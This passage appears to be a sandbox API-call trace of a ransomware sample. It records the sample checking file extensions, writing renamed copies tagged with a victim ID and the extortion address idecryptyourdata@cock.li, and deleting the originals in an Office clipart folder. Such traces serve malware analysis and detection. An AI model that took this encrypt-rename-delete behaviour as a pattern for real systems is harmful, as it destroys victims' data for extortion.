returned -1 [0199.688] lstrlenW (lpString=".xls") returned 4 [0199.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.688] lstrlenW (lpString=".xlsx") returned 5 [0199.689] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0199.689] lstrlenW (lpString=".ppt") returned 4 [0199.689] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 68 [0199.689] lstrlenW (lpString=".zip") returned 4 [0199.689] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.689] lstrlenW (lpString=".rar") returned 4 [0199.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.689] lstrlenW (lpString=".bz2") returned 4 [0199.689] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.689] lstrlenW (lpString=".7z") returned 3 [0199.689] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 68 [0199.689] lstrlenW (lpString=".dbf") returned 4 [0199.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 68 [0199.689] lstrlenW (lpString=".1cd") returned 4 [0199.689] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 68 [0199.689] lstrlenW (lpString=".jpg") returned 4 [0199.689] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.689] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.690] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.690] GetLastError () returned 0x0 [0199.690] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x714e, lpOverlapped=0x0) returned 1 [0199.800] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7150, lpOverlapped=0x0) returned 1 [0199.802] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.802] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.803] SetEndOfFile (hFile=0x380) returned 1 [0199.803] CloseHandle (hObject=0x380) returned 1 [0199.803] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.803] SetEndOfFile (hFile=0x3a0) returned 1 [0199.804] CloseHandle (hObject=0x3a0) returned 1 [0199.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.804] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf")) returned 1 [0199.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 68 [0199.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 68 [0199.804] lstrlenW (lpString=".doc") returned 4 [0199.804] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString=".docx") returned 5 [0199.805] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0199.805] lstrlenW (lpString=".pdf") returned 4 [0199.805] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString=".xls") returned 4 [0199.805] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.805] lstrlenW (lpString=".xlsx") returned 5 [0199.805] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0199.805] lstrlenW (lpString=".ppt") returned 4 [0199.805] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 68 [0199.805] lstrlenW (lpString=".zip") returned 4 [0199.805] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.805] lstrlenW (lpString=".rar") returned 4 [0199.805] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString=".bz2") returned 4 [0199.805] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString=".7z") returned 3 [0199.805] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 68 [0199.805] lstrlenW (lpString=".dbf") returned 4 [0199.805] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 68 [0199.805] lstrlenW (lpString=".1cd") returned 4 [0199.805] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF") returned 68 [0199.805] lstrlenW (lpString=".jpg") returned 4 [0199.806] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.806] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.806] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.806] GetLastError () returned 0x0 [0199.807] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x4124, lpOverlapped=0x0) returned 1 [0199.859] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x4130, lpOverlapped=0x0) returned 1 [0199.860] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.860] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.860] SetEndOfFile (hFile=0x380) returned 1 [0199.860] CloseHandle (hObject=0x380) returned 1 [0199.860] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.860] SetEndOfFile (hFile=0x3a0) returned 1 [0199.861] CloseHandle (hObject=0x3a0) returned 1 [0199.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf")) returned 1 [0199.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 68 [0199.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 68 [0199.873] lstrlenW (lpString=".doc") returned 4 [0199.873] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.873] lstrlenW (lpString=".docx") returned 5 [0199.874] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0199.874] lstrlenW (lpString=".pdf") returned 4 [0199.874] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.874] lstrlenW (lpString=".xls") returned 4 [0199.874] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.874] lstrlenW (lpString=".xlsx") returned 5 [0199.874] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0199.874] lstrlenW (lpString=".ppt") returned 4 [0199.874] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 68 [0199.874] lstrlenW (lpString=".zip") returned 4 [0199.874] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.874] lstrlenW (lpString=".rar") returned 4 [0199.874] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.874] lstrlenW (lpString=".bz2") returned 4 [0199.874] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.874] lstrlenW (lpString=".7z") returned 3 [0199.874] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 68 [0199.874] lstrlenW (lpString=".dbf") returned 4 [0199.874] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 68 [0199.874] lstrlenW (lpString=".1cd") returned 4 [0199.874] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 68 [0199.874] lstrlenW (lpString=".jpg") returned 4 [0199.874] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.875] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.875] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.876] GetLastError () returned 0x0 [0199.876] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x13c4, lpOverlapped=0x0) returned 1 [0199.985] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x13d0, lpOverlapped=0x0) returned 1 [0199.986] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.986] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.986] SetEndOfFile (hFile=0x380) returned 1 [0199.986] CloseHandle (hObject=0x380) returned 1 [0199.986] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.986] SetEndOfFile (hFile=0x3a0) returned 1 [0199.987] CloseHandle (hObject=0x3a0) returned 1 [0199.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.987] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf")) returned 1 [0199.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 68 [0199.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 68 [0199.988] lstrlenW (lpString=".doc") returned 4 [0199.988] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.988] lstrlenW (lpString=".docx") returned 5 [0199.988] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0199.988] lstrlenW (lpString=".pdf") returned 4 [0199.988] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.988] lstrlenW (lpString=".xls") returned 4 [0199.988] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.988] lstrlenW (lpString=".xlsx") returned 5 [0199.988] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0199.988] lstrlenW (lpString=".ppt") returned 4 [0199.988] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 68 [0199.988] lstrlenW (lpString=".zip") returned 4 [0199.988] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.988] lstrlenW (lpString=".rar") returned 4 [0199.988] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.988] lstrlenW (lpString=".bz2") returned 4 [0199.989] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.989] lstrlenW (lpString=".7z") returned 3 [0199.989] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 68 [0199.989] lstrlenW (lpString=".dbf") returned 4 [0199.989] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 68 [0199.989] lstrlenW (lpString=".1cd") returned 4 [0199.989] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 68 [0199.989] lstrlenW (lpString=".jpg") returned 4 [0199.989] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.990] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.990] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.990] GetLastError () returned 0x0 [0199.990] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x27b4, lpOverlapped=0x0) returned 1 [0200.077] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x27c0, lpOverlapped=0x0) returned 1 [0200.078] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.078] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.078] SetEndOfFile (hFile=0x380) returned 1 [0200.078] CloseHandle (hObject=0x380) returned 1 [0200.078] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.078] SetEndOfFile (hFile=0x3a0) returned 1 [0200.079] CloseHandle (hObject=0x3a0) returned 1 [0200.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf")) returned 1 [0200.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 68 [0200.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 68 [0200.080] lstrlenW (lpString=".doc") returned 4 [0200.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.080] lstrlenW (lpString=".docx") returned 5 [0200.080] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.080] lstrlenW (lpString=".pdf") returned 4 [0200.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.081] lstrlenW (lpString=".xls") returned 4 [0200.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.081] lstrlenW (lpString=".xlsx") returned 5 [0200.081] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.081] lstrlenW (lpString=".ppt") returned 4 [0200.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 68 [0200.081] lstrlenW (lpString=".zip") returned 4 [0200.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.081] lstrlenW (lpString=".rar") returned 4 [0200.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.081] lstrlenW (lpString=".bz2") returned 4 [0200.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.081] lstrlenW (lpString=".7z") returned 3 [0200.081] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 68 [0200.081] lstrlenW (lpString=".dbf") returned 4 [0200.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 68 [0200.081] lstrlenW (lpString=".1cd") returned 4 [0200.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 68 [0200.081] lstrlenW (lpString=".jpg") returned 4 [0200.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.082] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.082] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0200.083] GetLastError () returned 0x0 [0200.083] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x14c0, lpOverlapped=0x0) returned 1 [0200.124] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x14d0, lpOverlapped=0x0) returned 1 [0200.125] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.125] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.125] SetEndOfFile (hFile=0x380) returned 1 [0200.126] CloseHandle (hObject=0x380) returned 1 [0200.126] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.126] SetEndOfFile (hFile=0x3a0) returned 1 [0200.126] CloseHandle (hObject=0x3a0) returned 1 [0200.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.127] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf")) returned 1 [0200.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 68 [0200.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 68 [0200.127] lstrlenW (lpString=".doc") returned 4 [0200.127] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.127] lstrlenW (lpString=".docx") returned 5 [0200.127] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.127] lstrlenW (lpString=".pdf") returned 4 [0200.127] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.127] lstrlenW (lpString=".xls") returned 4 [0200.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.127] lstrlenW (lpString=".xlsx") returned 5 [0200.127] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.127] lstrlenW (lpString=".ppt") returned 4 [0200.128] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 68 [0200.128] lstrlenW (lpString=".zip") returned 4 [0200.128] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.128] lstrlenW (lpString=".rar") returned 4 [0200.128] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.128] lstrlenW (lpString=".bz2") returned 4 [0200.128] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.128] lstrlenW (lpString=".7z") returned 3 [0200.128] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 68 [0200.128] lstrlenW (lpString=".dbf") returned 4 [0200.128] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 68 [0200.128] lstrlenW (lpString=".1cd") returned 4 [0200.128] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF") returned 68 [0200.128] lstrlenW (lpString=".jpg") returned 4 [0200.128] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.129] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.129] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, 